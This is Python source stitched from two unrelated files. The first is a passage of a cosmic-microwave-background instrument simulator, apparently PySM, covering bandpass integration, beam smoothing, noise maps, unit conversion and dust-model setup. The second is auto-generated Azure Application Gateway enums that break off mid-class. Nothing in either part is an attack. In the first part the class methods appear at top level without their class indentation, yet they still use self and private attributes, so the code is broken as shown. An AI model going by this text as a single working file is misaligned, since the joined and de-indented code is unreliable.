    self.__beams = value
@property
def Sens_I(self):
    """Intensity sensitivities per channel; exits if never set."""
    try:
        sens = self.__sens_I
    except AttributeError:
        print("Instrument attribute 'Sens_I' not set.")
        sys.exit(1)
    return sens
@Sens_I.setter
def Sens_I(self, value):
    # Stored under the name-mangled private attribute read by the getter.
    self.__sens_I = value
@property
def Sens_P(self):
    """Polarisation sensitivities per channel; exits if never set."""
    try:
        sens = self.__sens_P
    except AttributeError:
        print("Instrument attribute 'Sens_P' not set.")
        sys.exit(1)
    return sens
@Sens_P.setter
def Sens_P(self, value):
    # Stored under the name-mangled private attribute read by the getter.
    self.__sens_P = value
@property
def Nside(self):
    """Healpix nside of the output maps; exits if never set."""
    try:
        nside = self.__nside
    except AttributeError:
        print("Instrument attribute 'Nside' not set.")
        sys.exit(1)
    return nside
@property
def Noise_Seed(self):
    """Seed used for the noise realisation; exits if never set."""
    try:
        seed = self.__noise_seed
    except AttributeError:
        print("Instrument attribute 'Noise_Seed' not set.")
        sys.exit(1)
    return seed
@property
def Use_Bandpass(self):
    """Whether channels are integrated over a bandpass; exits if never set."""
    try:
        flag = self.__use_bandpass
    except AttributeError:
        print("Instrument attribute 'Use_Bandpass' not set.")
        sys.exit(1)
    return flag
@property
def Output_Prefix(self):
    """Prefix for all output file names; exits if never set."""
    try:
        prefix = self.__output_prefix
    except AttributeError:
        print("Instrument attribute 'Output_Prefix' not set.")
        sys.exit(1)
    return prefix
@property
def Output_Directory(self):
    """Directory the output files are written to; exits if never set."""
    try:
        directory = self.__output_directory
    except AttributeError:
        print("Instrument attribute 'Output_Directory' not set.")
        sys.exit(1)
    return directory
@property
def Channel_Names(self):
    """Labels used in file names for bandpass channel maps; exits if never set."""
    try:
        names = self.__channel_names
    except AttributeError:
        print("Instrument attribute 'Channel_Names' not set.")
        sys.exit(1)
    return names
@property
def Write_Components(self):
    """Configuration flag read from the instrument config; exits if never set."""
    try:
        flag = self.__write_components
    except AttributeError:
        print("Instrument attribute 'Write_Components' not set.")
        sys.exit(1)
    return flag
@property
def Add_Noise(self):
    """Whether white noise is added to the observations.

    Exits if the attribute was never set, consistent with the other
    required-configuration properties of this class (the original
    getter only printed a warning and silently returned None).
    """
    try:
        return self.__add_noise
    except AttributeError:
        print("Instrument attribute 'Add_Noise' not set.")
        sys.exit(1)
@property
def Use_Smoothing(self):
    """Whether maps are smoothed with the instrument beams.

    Exits if the attribute was never set, consistent with the other
    required-configuration properties of this class (the original
    getter only printed a warning and silently returned None).
    """
    try:
        return self.__use_smoothing
    except AttributeError:
        print("Instrument attribute 'Use_Smoothing' not set.")
        sys.exit(1)
@property
def Output_Units(self):
    """Units in which the output maps are written.

    Exits if the attribute was never set, consistent with the other
    required-configuration properties of this class.
    """
    try:
        return self.__output_units
    except AttributeError:
        # Quote only the attribute name (the original message had the
        # closing quote misplaced after the full sentence).
        print("Instrument attribute 'Output_Units' not set.")
        sys.exit(1)
@property
def pixel_indices(self):
    # Optional subset of healpix pixels to simulate.
    # NOTE(review): unlike the sibling properties this getter does NOT
    # sys.exit when the attribute is unset -- it prints a warning and
    # implicitly returns None. smoother() and noiser() treat a None value
    # as "full sky", so the fall-through looks intentional; confirm before
    # making it exit like the others.
    try:
        return self.__pixel_indices
    except AttributeError:
        print("Instrument attribute 'pixel_indices' not set.")
def observe(self, Sky, write_outputs=True):
    """Apply instrument effects to the signal of a Sky instance.

    Evaluates the Sky signal at the requested frequencies (or over the
    requested bandpasses), optionally smooths with Gaussian beams,
    optionally adds white noise, converts units, and finally either
    writes the maps to file or returns them.

    :param Sky: instance of the :class:`pysm.pysm.Sky` class.
    :type Sky: class
    :param write_outputs: write maps to file when True, otherwise return them.
    :return: None when writing to file, else (output, noise) arrays.
    """
    self.print_info()
    observed = self.apply_bandpass(Sky.signal(), Sky)
    observed = self.smoother(observed)
    noise = self.noiser()
    observed, noise = self.unit_converter(observed, noise)
    if not write_outputs:
        return observed, noise
    self.writer(observed, noise)
def apply_bandpass(self, signal, Sky):
    """Integrate the signal over each channel bandpass, or evaluate it
    at delta frequencies when no bandpass is used.

    Frequencies must be evenly spaced (checked downstream) and the
    weights must be normalisable.

    :param signal: signal function to be integrated over the bandpass.
    :type signal: function
    :param Sky: Sky instance, needed for the HD17 dust special case.
    :return: maps of shape (N_freqs, 3, Npix) or (N_channels, 3, Npix) -- numpy.ndarray
    """
    if not self.Use_Bandpass:
        # Delta bandpasses: simply evaluate at the requested frequencies.
        return signal(self.Frequencies)
    if self.Use_Bandpass:
        # Tell the Sky class we are integrating over a bandpass, and
        # whether the HD17 dust model is in use.
        bpass_signal = Sky.signal(use_bandpass=Sky.Uses_HD17)
        # Integrate in Jy/sr.
        signal_Jysr = lambda nu: bpass_signal(nu) * convert_units("uK_RJ", "Jysr", nu)
        bpass_integrated = np.array([bandpass(f, w, signal_Jysr)
                                     for (f, w) in self.Channels])
        # HD17 dust must be initialised with the bandpass information up
        # front (for efficiency), so its contribution is evaluated via
        # HD_17_bpass and added here; it contributed zero to the sum above.
        if Sky.Uses_HD17:
            bpass_integrated += np.array(list(map(Sky.HD_17_bpass, self.Channels)))
        return bpass_integrated
    # Defensive guard (unreachable for ordinary boolean flags).
    print("Please set 'Use_Bandpass' for Instrument object.")
    sys.exit(1)
def normalise_bandpass(self):
    """Normalise each channel's weights so they integrate to one over
    the channel's frequency range (frequencies in GHz, hence the 1.e9)."""
    normalised = []
    for freqs, weights in self.Channels:
        normalised.append((freqs, weights / np.trapz(weights, freqs * 1.e9)))
    self.Channels = normalised
def smoother(self, map_array):
    """Smooth an array of N (T, Q, U) maps with the instrument's N
    Gaussian beams (FWHMs in arcmin).

    :param map_array: maps to smooth, shape (N, 3, Npix).
    :type map_array: numpy.ndarray
    :return: smoothed maps -- numpy.ndarray
    """
    if not self.Use_Smoothing:
        return map_array
    if self.Use_Smoothing:
        partial_sky = self.pixel_indices is not None
        # hp.smoothing operates on full-sky maps, so a partial map must
        # be expanded first.
        if partial_sky:
            full_map = build_full_map(self.pixel_indices, map_array, self.Nside)
        else:
            full_map = map_array
        # FWHM converted from arcmin to radians.
        smoothed = np.array([hp.smoothing(m, fwhm=np.pi / 180. * b / 60., verbose=False)
                             for m, b in zip(full_map, self.Beams)])
        if not partial_sky:
            return smoothed
        assert smoothed.ndim == 3, \
            "Assuming map array is 3 dimensional (n_freqs x n_maps x n_pixels)"
        return smoothed[..., self.pixel_indices]
    # Defensive guard (unreachable for ordinary boolean flags).
    print("Please set 'Use_Smoothing' in Instrument object.")
    sys.exit(1)
def noiser(self):
    """Calculate white noise maps for the given sensitivities.

    Returns an array of (T, Q, U) noise maps, one per channel, at the
    instrument Nside (or on the requested pixel subset). Input
    sensitivities are expected to be in uK_CMB amin, as elsewhere in
    PySM. When `Add_Noise` is False, zeros of the same shape are
    returned.

    :return: noise maps, shape (N_channels, 3, npix) -- numpy.ndarray
    """
    # Number of pixels: the requested subset if pixel_indices is set,
    # otherwise the full sky (pixel_indices may be None -> TypeError).
    try:
        npix = len(self.pixel_indices)
    except TypeError:
        npix = hp.nside2npix(self.Nside)
    if not self.Add_Noise:
        return np.zeros((len(self.Sens_I), 3, npix))
    elif self.Add_Noise:
        # solid angle per pixel in amin2
        pix_amin2 = 4. * np.pi / float(hp.nside2npix(self.Nside)) * (180. * 60. / np.pi) ** 2
        """sigma_pix_I/P is std of noise per pixel. It is an array of length
        equal to the number of input maps."""
        sigma_pix_I = np.sqrt(self.Sens_I ** 2 / pix_amin2)
        sigma_pix_P = np.sqrt(self.Sens_P ** 2 / pix_amin2)
        # Seeded so that noise realisations are reproducible across runs.
        np.random.seed(seed = self.Noise_Seed)
        noise = np.random.randn(len(self.Sens_I), 3, npix)
        # Scale unit-variance draws: row 0 is intensity, rows 1-2 are Q/U.
        noise[:, 0, :] *= sigma_pix_I[:, None]
        noise[:, 1, :] *= sigma_pix_P[:, None]
        noise[:, 2, :] *= sigma_pix_P[:, None]
        return noise
    else:
        # Unreachable for ordinary boolean values; kept as a guard.
        print("Please set 'Add_Noise' in Instrument object.")
        sys.exit(1)
def unit_converter(self, map_array, noise):
    """Convert signal and noise maps to the requested output units.

    For delta bandpasses the standard conversion factor is evaluated at
    each frequency; for real bandpasses the factor is computed following
    the Planck HFI definitions.

    :param map_array: signal map to convert units of.
    :type map_array: numpy.ndarray
    :param noise: noise map to convert units of.
    :type noise: numpy.ndarray
    :return: signal map and noise map in output units -- numpy.ndarray
    """
    if self.Use_Bandpass:
        # Per-channel conversion as explained in the documentation of
        # bandpass_convert_units.
        Uc_signal = np.array([bandpass_convert_units(self.Output_Units, channel)
                              for channel in self.Channels])
    else:
        # Delta bandpass: standard conversion evaluated at the
        # frequencies of interest. All the scaling is done in uK_RJ.
        Uc_signal = np.array(convert_units("uK_RJ", self.Output_Units, self.Frequencies))
    if not self.Add_Noise:
        Uc_noise = np.zeros_like(Uc_signal)
    elif self.Use_Bandpass:
        # Noise is generated in uK_CMB: convert it to Jysr first, then
        # apply the same conversion as used for the signal.
        Uc_noise = Uc_signal * np.array([1. / bandpass_convert_units("uK_CMB", channel)
                                         for channel in self.Channels])
    else:
        Uc_noise = np.array(convert_units("uK_CMB", self.Output_Units, self.Frequencies))
    return Uc_signal[:, None, None] * map_array, Uc_noise[:, None, None] * noise
def file_path(self, channel_name = None, f = None, extra_info = ""):
    """Return the output FITS file path for a map.

    Delta-bandpass outputs are labelled by frequency, bandpass outputs
    by channel name.

    :param channel_name: channel label (bandpass case).
    :param f: frequency in GHz (delta-bandpass case).
    :param extra_info: tag inserted into the file name, e.g. 'total'.
    :return: full path of the output file -- str
    """
    if not self.Use_Bandpass:
        # e.g. 30.0 GHz -> '0030p00'
        freq_tag = str("%07.2f" % f).replace(".", "p")
        fname = '%s_nu%sGHz_%s_nside%04d.fits' % (self.Output_Prefix, freq_tag, extra_info, self.Nside)
    elif self.Use_Bandpass:
        fname = '%s_bandpass_%s_%s_nside%04d.fits' % (self.Output_Prefix, channel_name, extra_info, self.Nside)
    else:
        print("Bandpass set incorrectly.")
        sys.exit(1)
    return os.path.join(self.Output_Directory, fname)
def writer(self, output, noise):
    """Write the total (and, if noise is requested, noise) maps to file.

    Removed leftover debug prints of the per-map standard deviations
    (one carried commented-out scaling code) that polluted stdout on
    every write.

    :param output: signal maps, one per frequency/channel.
    :type output: numpy.ndarray
    :param noise: noise maps, one per frequency/channel.
    :type noise: numpy.ndarray
    :return: no return, writes to file.
    """
    if not self.Use_Bandpass:
        if self.Add_Noise:
            for f, o, n in zip(self.Frequencies, output, noise):
                write_map(self.file_path(f = f, extra_info = "noise"), n, nside=self.Nside, pixel_indices=self.pixel_indices)
                write_map(self.file_path(f = f, extra_info = "total"), o + n, nside=self.Nside, pixel_indices=self.pixel_indices)
        elif not self.Add_Noise:
            for f, o in zip(self.Frequencies, output):
                write_map(self.file_path(f = f, extra_info = "total"), o, nside=self.Nside, pixel_indices=self.pixel_indices)
    elif self.Use_Bandpass:
        if self.Add_Noise:
            for c, o, n in zip(self.Channel_Names, output, noise):
                write_map(self.file_path(channel_name = c, extra_info = "total"), o + n, nside=self.Nside, pixel_indices=self.pixel_indices)
                write_map(self.file_path(channel_name = c, extra_info = "noise"), n, nside=self.Nside, pixel_indices=self.pixel_indices)
        elif not self.Add_Noise:
            for c, o in zip(self.Channel_Names, output):
                write_map(self.file_path(channel_name = c, extra_info = "total"), o, nside=self.Nside, pixel_indices=self.pixel_indices)
    return
def print_info(self):
    """Print the current Instrument specification to screen."""
    if not self.Use_Bandpass:
        # The per-frequency arrays must line up one-to-one.
        if not check_lengths(self.Frequencies, self.Beams, self.Sens_I, self.Sens_P):
            print("Check lengths of frequencies, beams, and sensitivities are equal.")
            sys.exit(1)
        print("nu (GHz) | sigma_I (uK_CMB amin) | sigma_P (uK_CMB amin) | FWHM (arcmin) \n")
        rows = zip(self.Frequencies, self.Sens_I, self.Sens_P, self.Beams)
        for freq, s_I, s_P, fwhm in rows:
            print("%07.2f | %05.2f | %05.2f | %05.2f "%(freq, s_I, s_P, fwhm))
    elif self.Use_Bandpass:
        print("Channel name | sigma_I (uK_CMB amin) | sigma_P (uK_CMB amin) | FWHM (arcmin) |")
        rows = zip(self.Channel_Names, self.Sens_I, self.Sens_P, self.Beams)
        for name, s_I, s_P, fwhm in rows:
            print("%s | %05.2f | %05.2f | %05.2f "%(name, s_I, s_P, fwhm))
def bandpass(frequencies, weights, signal):
    """Integrate `signal` over a bandpass.

    Frequencies (GHz) must be evenly spaced, otherwise the process
    exits. Weights must be normalisable to integrate to one.

    Fix: normalisation previously used ``weights /= ...`` which mutated
    the caller's array in place; we now normalise a fresh array instead.

    :param frequencies: evenly spaced frequencies in GHz -- numpy.ndarray
    :param weights: bandpass weights, one per frequency -- numpy.ndarray
    :param signal: function of frequency returning the emission (Jy/sr here).
    :return: bandpass-integrated signal.
    """
    # check that the frequencies are evenly spaced.
    check_bpass_frequencies(frequencies)
    frequency_separation = (frequencies[1] - frequencies[0]) * 1.e9
    # Normalise a copy of the weights (leave the caller's array intact)
    # and check that they integrate to 1.
    weights = weights / np.sum(weights * frequency_separation)
    check_bpass_weights_normalisation(weights, frequency_separation)
    # Riemann sum: integrand = signal(nu) * w(nu) * d(nu).
    return sum(signal(nu) * w * frequency_separation
               for nu, w in zip(frequencies, weights))
def check_bpass_weights_normalisation(weights, spacing):
    """Exit if the bandpass weights do not integrate to one.

    :param weights: normalised bandpass weights -- numpy.ndarray
    :param spacing: frequency spacing in Hz -- float
    """
    try:
        np.testing.assert_almost_equal(np.sum(weights * spacing), 1, decimal = 3)
    except AssertionError:
        print("Bandpass weights can not be normalised.")
        sys.exit(1)
    return
def check_bpass_frequencies(frequencies):
    """Exit if the bandpass frequencies are not evenly spaced.

    Checks the mean spacing against the full range, then every
    individual gap against the first gap (all to 3 decimal places,
    relative to the range).
    """
    frequency_separation = frequencies[1] - frequencies[0]
    number_of_frequencies = frequencies.size
    frequency_range = frequencies[-1] - frequencies[0]
    try:
        np.testing.assert_almost_equal(frequency_separation * (number_of_frequencies - 1) / frequency_range, 1., decimal = 3)
    except AssertionError:
        print("Bandpass frequencies not evenly spaced.")
        sys.exit(1)
    for i in range(frequencies.size - 1):
        spacing = frequencies[i + 1] - frequencies[i]
        try:
            np.testing.assert_almost_equal(spacing / frequency_range, frequency_separation / frequency_range, decimal = 3)
        except AssertionError:
            print("Bandpass frequencies not evenly spaced.")
            sys.exit(1)
    return
def component_adder(component_class, dictionary_list, **kwargs):
    """Combine several populations of one component into a single signal.

    Each dictionary in `dictionary_list` configures one population of
    `component_class`. Instantiation (and therefore any expensive
    scaling-law setup) happens once here, not on every evaluation of the
    returned function.

    :param component_class: class implementing the component model.
    :param dictionary_list: one configuration dict per population.
    :return: function of frequency nu returning the summed emission of
        all populations.
    """
    # One signal function per population, built up front.
    population_signals = [component_class(config).signal(**kwargs)
                          for config in dictionary_list]
    def total_signal(nu, **inner_kwargs):
        # Sum the contribution of every population at frequency nu.
        total = 0
        for population_signal in population_signals:
            total += population_signal(nu, **inner_kwargs)
        return total
    return total_signal
def initialise_hd_dust_model_bandpass(hd_unint_signal, mpi_comm, **kwargs):
    """Function to initialise the bandpass-integrated
    version of the Hensley-Draine 2017 model.
    The keyword arguments are expected to be the initialisation
    dictionary for the HD dust component.
    :param hd_unint_signal: signal of the un-integrated HD17 model.
    :type hd_unint_signal: function
    :param mpi_comm: MPI communicator forwarded to Dust.draw_uval.
    :return: function mapping a (frequencies, weights) channel tuple to
        bandpass-integrated (I, Q, U) dust maps.
    """
    #Draw map of uval using Commander dust data.
    uval = Dust.draw_uval(kwargs['draw_uval_seed'], kwargs['nside'], mpi_comm)
    # Restrict to the requested pixel subset, if any.
    if "pixel_indices" in kwargs and kwargs["pixel_indices"] is not None:
        uval = uval[kwargs["pixel_indices"]]
    #Read in the precomputed dust emission spectra as a function of lambda and U.
    # NOTE(review): from the slicing below, columns 3:84 appear to be
    # intensity and 84:165 polarisation, on a grid of len(uvec) U values;
    # confirm against the HD17 data files.
    data_sil, data_silfe, data_car, wav, uvec = Dust.read_hd_data()
    # Speed of light in cgs (cm/s), matching wav in microns * 1.e-4 -> cm.
    c = 2.99792458e10
    fcar = kwargs['fcar']    # carbonaceous grain fraction
    f_fe = kwargs['f_fe']    # iron-bearing silicate fraction
    #Interpolate the dust emission properties in uval and freuency, this is necessary to compute the factor to
    #rescale the dust emission templates to the new model.
    sil_i = interpolate.RectBivariateSpline(uvec,wav,(data_sil[:,3:84]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
    car_i = interpolate.RectBivariateSpline(uvec,wav,(data_car[:,3:84]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
    silfe_i = interpolate.RectBivariateSpline(uvec,wav,(data_silfe[:,3:84]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
    sil_p = interpolate.RectBivariateSpline(uvec,wav,(data_sil[:,84:165]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
    car_p = interpolate.RectBivariateSpline(uvec,wav,(data_car[:,84:165]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
    silfe_p = interpolate.RectBivariateSpline(uvec,wav,(data_silfe[:,84:165]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
    # GHz -> wavelength; presumably microns given constants.c in SI
    # (c[m/s] / (nu*1e9) * 1e6 um/m == 1e-3 * c / nu) -- TODO confirm.
    nu_to_lambda = lambda x: 1.e-3 * constants.c / x #Note this is in SI units.
    # Un-integrated model evaluated at a single frequency, mixing the
    # three grain species with weights (1 - f_fe), fcar, f_fe.
    non_int_model_i = lambda nu: (1. - f_fe) * sil_i.ev(uval, nu_to_lambda(nu)) + fcar * car_i.ev(uval, nu_to_lambda(nu)) + f_fe * silfe_i.ev(uval, nu_to_lambda(nu))
    non_int_model_p = lambda nu: (1. - f_fe) * sil_p.ev(uval, nu_to_lambda(nu)) + fcar * car_p.ev(uval, nu_to_lambda(nu)) + f_fe * silfe_p.ev(uval, nu_to_lambda(nu))
    # Rescale the template amplitudes so the model matches the input
    # templates (in uK_RJ) at the reference frequencies nu_0_I / nu_0_P.
    A_I = kwargs['A_I'] * convert_units("uK_RJ", "Jysr", kwargs['nu_0_I']) / non_int_model_i(kwargs['nu_0_I'])
    A_Q = kwargs['A_Q'] * convert_units("uK_RJ", "Jysr", kwargs['nu_0_P']) / non_int_model_p(kwargs['nu_0_P'])
    A_U = kwargs['A_U'] * convert_units("uK_RJ", "Jysr", kwargs['nu_0_P']) / non_int_model_p(kwargs['nu_0_P'])
    def bpass_model(channel):
        """Note that nu is in GHz, and so we have to multipl by 1.e9 in the following functions.
        """
        (nu, t_nu) = channel
        # Integrate table over bandpass.
        sil_i_vec = np.zeros(len(uvec))
        car_i_vec = np.zeros(len(uvec))
        silfe_i_vec = np.zeros(len(uvec))
        sil_p_vec = np.zeros(len(uvec))
        car_p_vec = np.zeros(len(uvec))
        silfe_p_vec = np.zeros(len(uvec))
        for i in range(len(uvec)):
            # Note: Table in terms of wavelength in um, increasing
            # and lambda*I_lambda. Thus we reverse the order
            # to nu increasing before interpolating to the
            # bandpass frequencies, then divide by nu to get
            # I_nu.
            sil_i_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_sil[::-1,3+i]*1.e23)/nu*1.e-9, nu*1.e9)
            car_i_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_car[::-1,3+i]*1.e23)/nu*1.e-9, nu*1.e9)
            silfe_i_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_silfe[::-1,3+i]*1.e23)/nu*1.e-9, nu*1.e9)
            sil_p_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_sil[::-1,84+i]*1.e23)/nu*1.e-9, nu*1.e9)
            car_p_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_car[::-1,84+i]*1.e23)/nu*1.e-9, nu*1.e9)
            silfe_p_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_silfe[::-1,84+i]*1.e23)/nu*1.e-9, nu*1.e9)
        # Step 2: Interpolate over U values
        sil_i = interpolate.interp1d(uvec, sil_i_vec)
        car_i = interpolate.interp1d(uvec, car_i_vec)
        silfe_i = interpolate.interp1d(uvec, silfe_i_vec)
        sil_p = interpolate.interp1d(uvec, sil_p_vec)
        car_p = interpolate.interp1d(uvec, car_p_vec)
        silfe_p = interpolate.interp1d(uvec, silfe_p_vec)
        #We now compute the final scaling. The integrated quantities sil_i,
        #car_i silfe_i etc.. are in Jy/sr. Therefore we want to convert the
        #templates from uK_RJ to Jy/sr.
        scaling_I = ((1. - f_fe) * sil_i(uval) + fcar * car_i(uval) + f_fe * silfe_i(uval))
        scaling_P = ((1. - f_fe) * sil_p(uval) + fcar * car_p(uval) + f_fe * silfe_p(uval))
        return np.array([scaling_I * A_I, scaling_P * A_Q, scaling_P * A_U])
    return bpass_model
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
    """Enum metaclass making member lookup by name case-insensitive,
    both for indexing (``E["name"]``) and attribute access (``E.name``).
    """
    def __getitem__(cls, name):
        # Canonical member names are upper-case; normalise before lookup.
        return super().__getitem__(name.upper())
    def __getattr__(cls, name):
        """Return the enum member matching `name`.

        __getattr__ (rather than descriptors or entries in the enum
        class' __dict__) is used so that `name` and `value` keep working
        both as properties of enum members and as members themselves.
        """
        member = cls._member_map_.get(name.upper())
        if member is None:
            raise AttributeError(name)
        return member
class Access(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Indicates whether the traffic is allowed or denied.
    """

    # Generated code: member values are the exact strings used by the service.
    ALLOW = "Allow"
    DENY = "Deny"
class ApplicationGatewayBackendHealthServerHealth(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Health of backend server.
    """

    # Generated code: member values are the exact strings used by the service.
    UNKNOWN = "Unknown"
    UP = "Up"
    DOWN = "Down"
    PARTIAL = "Partial"
    DRAINING = "Draining"
class ApplicationGatewayCookieBasedAffinity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Cookie based affinity.
    """

    # Generated code: member values are the exact strings used by the service.
    ENABLED = "Enabled"
    DISABLED = "Disabled"
class ApplicationGatewayCustomErrorStatusCode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Status code of the application gateway customer error.
    """

    # Generated code: member values are the exact strings used by the service.
    HTTP_STATUS403 = "HttpStatus403"
    HTTP_STATUS502 = "HttpStatus502"
class ApplicationGatewayFirewallMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Web application firewall mode.
    """

    # Generated code: member values are the exact strings used by the service.
    DETECTION = "Detection"
    PREVENTION = "Prevention"
class ApplicationGatewayOperationalState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Operational state of the application gateway resource.
    """

    # Generated code: member values are the exact strings used by the service.
    STOPPED = "Stopped"
    STARTING = "Starting"
    RUNNING = "Running"
    STOPPING = "Stopping"
class ApplicationGatewayProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The protocol used to communicate with the backend. Possible values are 'Http' and 'Https'.
    """

    # Generated code: member values are the exact strings used by the service.
    HTTP = "Http"
    HTTPS = "Https"
class ApplicationGatewayRedirectType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Redirect type.
    """

    # Generated code: values name the standard HTTP redirect kinds.
    PERMANENT = "Permanent"
    FOUND = "Found"
    SEE_OTHER = "SeeOther"
    TEMPORARY = "Temporary"
class ApplicationGatewayRequestRoutingRuleType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Rule type.
    """

    # Generated code: member values are the exact strings used by the service.
    BASIC = "Basic"
    PATH_BASED_ROUTING = "PathBasedRouting"
class ApplicationGatewaySkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Name of an application gateway SKU.
    """

    # Generated code: member values are the exact strings used by the service.
    STANDARD_SMALL = "Standard_Small"
    STANDARD_MEDIUM = "Standard_Medium"
    STANDARD_LARGE = "Standard_Large"
    WAF_MEDIUM = "WAF_Medium"
    WAF_LARGE = "WAF_Large"
    STANDARD_V2 = "Standard_v2"
    WAF_V2 = "WAF_v2"
class ApplicationGatewaySslCipherSuite(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Ssl cipher suites enums.
    """

    # Generated code: member names are mechanically derived from the IANA
    # cipher-suite strings (digit runs fused, e.g. AES256 -> AES_256 in the
    # value); the values are the exact strings used by the service.
    TLS_ECDHE_RSA_WITH_AES256_CBC_SHA384 = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"
    TLS_ECDHE_RSA_WITH_AES128_CBC_SHA256 = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"
    TLS_ECDHE_RSA_WITH_AES256_CBC_SHA = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"
    TLS_ECDHE_RSA_WITH_AES128_CBC_SHA = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"
    TLS_DHE_RSA_WITH_AES256_GCM_SHA384 = "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"
    TLS_DHE_RSA_WITH_AES128_GCM_SHA256 = "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"
    TLS_DHE_RSA_WITH_AES256_CBC_SHA = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA"
    TLS_DHE_RSA_WITH_AES128_CBC_SHA = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA"
    TLS_RSA_WITH_AES256_GCM_SHA384 = "TLS_RSA_WITH_AES_256_GCM_SHA384"
    TLS_RSA_WITH_AES128_GCM_SHA256 = "TLS_RSA_WITH_AES_128_GCM_SHA256"
    TLS_RSA_WITH_AES256_CBC_SHA256 = "TLS_RSA_WITH_AES_256_CBC_SHA256"
    TLS_RSA_WITH_AES128_CBC_SHA256 = "TLS_RSA_WITH_AES_128_CBC_SHA256"
    TLS_RSA_WITH_AES256_CBC_SHA = "TLS_RSA_WITH_AES_256_CBC_SHA"
    TLS_RSA_WITH_AES128_CBC_SHA = "TLS_RSA_WITH_AES_128_CBC_SHA"
    TLS_ECDHE_ECDSA_WITH_AES256_GCM_SHA384 = "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"
    TLS_ECDHE_ECDSA_WITH_AES128_GCM_SHA256 = "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"
    TLS_ECDHE_ECDSA_WITH_AES256_CBC_SHA384 = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"
    TLS_ECDHE_ECDSA_WITH_AES128_CBC_SHA256 = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"
    TLS_ECDHE_ECDSA_WITH_AES256_CBC_SHA = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"
    TLS_ECDHE_ECDSA_WITH_AES128_CBC_SHA = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"
    TLS_DHE_DSS_WITH_AES256_CBC_SHA256 = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"
    TLS_DHE_DSS_WITH_AES128_CBC_SHA256 = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"
    TLS_DHE_DSS_WITH_AES256_CBC_SHA = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA"
    TLS_DHE_DSS_WITH_AES128_CBC_SHA = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA"
    TLS_RSA_WITH3_DES_EDE_CBC_SHA = "TLS_RSA_WITH_3DES_EDE_CBC_SHA"
    TLS_DHE_DSS_WITH3_DES_EDE_CBC_SHA = "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"
    TLS_ECDHE_RSA_WITH_AES128_GCM_SHA256 = "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
    TLS_ECDHE_RSA_WITH_AES256_GCM_SHA384 = "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"
class ApplicationGatewaySslPolicyName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Ssl predefined policy name enums.
    """

    # Generated code: member values are the exact strings used by the service.
    APP_GW_SSL_POLICY20150501 = "AppGwSslPolicy20150501"
    APP_GW_SSL_POLICY20170401 = "AppGwSslPolicy20170401"
    APP_GW_SSL_POLICY20170401_S = "AppGwSslPolicy20170401S"
class ApplicationGatewaySslPolicyType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Type of Ssl Policy.
    """

    # Generated code: member values are the exact strings used by the service.
    PREDEFINED = "Predefined"
    CUSTOM = "Custom"
class ApplicationGatewaySslProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Ssl protocol enums.
    """

    # Generated code: the odd TL_SV1_x member names come from mechanical
    # splitting of "TLSv1_x"; values are the exact service strings.
    TL_SV1_0 = "TLSv1_0"
    TL_SV1_1 = "TLSv1_1"
    TL_SV1_2 = "TLSv1_2"
class ApplicationGatewayTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
